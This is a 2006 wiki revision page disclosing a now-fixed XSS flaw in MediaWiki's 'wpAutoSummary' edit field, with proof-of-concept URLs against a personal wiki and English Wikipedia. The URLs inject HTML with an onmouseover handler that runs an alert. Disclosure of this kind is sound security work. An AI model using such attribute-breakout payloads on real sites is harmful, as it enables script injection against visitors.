Difference between revisions of "MediaWiki/Parser43"

From Nick Jenkins
Jump to: navigation, search
m
 
Line 4: Line 4:
  
 
Proof-of-Concept, on my personal wiki:
 
Proof-of-Concept, on my personal wiki:
http://get-to-post.nickj.org/?http://nickj.org/index.php?title=MediaWiki/Parser43&action=edit&wpTextbox1=Try+moving+cursor+over+red+text+at+bottom+of+page+for+popup&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a
+
http://get-to-post.nickj.org/?http://nickj.org/index.php?title=Talk:MediaWiki/Parser43&action=edit&wpTextbox1=Try+moving+cursor+over+red+text+at+bottom+of+page+for+popup&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a
  
 
Proof-of-Concept, on the English Wikipedia:  
 
Proof-of-Concept, on the English Wikipedia:  
 
http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a
 
http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a
 
(will need to scroll down page to see). (Note: this is now fixed).
 
(will need to scroll down page to see). (Note: this is now fixed).

Latest revision as of 08:00, 16 June 2006

XSS Arbitrary JavaScript execution and HTML insertion.

The problem is the "wpAutoSummary" field.

Proof-of-Concept, on my personal wiki: http://get-to-post.nickj.org/?http://nickj.org/index.php?title=Talk:MediaWiki/Parser43&action=edit&wpTextbox1=Try+moving+cursor+over+red+text+at+bottom+of+page+for+popup&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a

Proof-of-Concept, on the English Wikipedia: http://get-to-post.nickj.org/?http://en.wikipedia.org/wiki/index.php?title=TESTTEST&action=edit&wpTextbox1=test&wpPreview=1&wpAutoSummary=%22+%2F%3E%3Ch1+style%3D%22text-align%3A+center%3B+font-size%3A+50pt%3B+color%3A+red%22+onmouseover%3D%22alert%28%27Ownage%21%27%29%3B%22%3EOWNAGE%3C%2Fh1%3E%3Chr+style%3D%22a (will need to scroll down page to see). (Note: this is now fixed).